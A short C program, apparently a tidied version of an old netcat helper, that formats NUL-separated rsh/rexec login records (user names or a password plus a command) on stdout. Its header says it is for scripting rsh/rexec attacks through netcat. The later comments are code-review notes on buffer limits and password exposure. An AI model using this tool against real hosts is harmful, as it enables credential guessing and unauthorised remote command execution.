- /* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
- rsh/rexec attacks. Needs to be a prog because shells strip out nulls.
-
- args:
- locuser remuser [cmd]
- remuser passwd [cmd]
-
- cmd defaults to "pwd".
-
- ... whatever. _H*/
-
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
-
/* Staging area for the assembled record.  Static storage, so it starts
   out zero-filled. */
static char buf[4096];

/* Command placed in the record when no third argument is supplied.
   Edit to taste; "id" is handy too, since its output shows which
   account the command ran as. */
static char cmd[] = "pwd";
-
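/*
 * Append one NUL-terminated field to buf at offset *used.
 *
 * The limit is the one the original enforced (the running offset must
 * stay strictly below sizeof buf, which leaves room for the trailing
 * newline), but it is tested BEFORE copying, so no pointer is ever
 * advanced past the end of buf.
 *
 * Returns 0 on success, -1 if the field does not fit.
 */
static int append_field(const char *s, size_t *used)
{
    size_t need = strlen(s) + 1;    /* field bytes plus its terminating NUL */

    if (need >= sizeof buf - *used)
        return -1;
    memcpy(buf + *used, s, need);
    *used += need;
    return 0;
}

/*
 * Emit "\0arg1\0arg2\0cmd\0\n" on stdout.
 *
 * Arguments: arg1 arg2 [cmd] -- per the file header, either
 * "locuser remuser [cmd]" or "remuser passwd [cmd]".  cmd falls back to
 * the file-level default when omitted.
 *
 * NOTE(review): in the second form a password is passed on the command
 * line, where it is visible to other local users through the process
 * listing and may end up in shell history.
 *
 * Exit status: 0 on success; 1 on too few arguments, on a record that
 * would not fit in buf, or on a write error.
 */
int main(int argc, char *argv[])
{
    size_t used = 1;            /* buf[0] stays 0: the leading NUL */
    size_t off = 0;
    const char *command = cmd;

    /* Test argc rather than argv[1]/argv[2]: argv[1] is not a valid
       element when argc is 0. */
    if (argc < 3) {
        fprintf(stderr, "wrong! needs 2 or more args.\n");
        return 1;
    }
    if (argc > 3)
        command = argv[3];

    memset(buf, 0, sizeof buf);

    if (append_field(argv[1], &used) < 0 ||
        append_field(argv[2], &used) < 0 ||
        append_field(command, &used) < 0) {
        /* Message text kept as-is; it really means "arguments too long
           for the fixed buffer". */
        fprintf(stderr, "out of memory!\n");
        return 1;
    }

    buf[used++] = '\n';         /* and a newline, so it goes */

    /* write() may be short or interrupted; keep going until the whole
       record is out, and report a real failure instead of ignoring it. */
    while (off < used) {
        ssize_t n = write(STDOUT_FILENO, buf + off, used - off);

        if (n < 0) {
            if (errno == EINTR)
                continue;
            perror("write");
            return 1;
        }
        off += (size_t)n;
    }

    return 0;
}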
-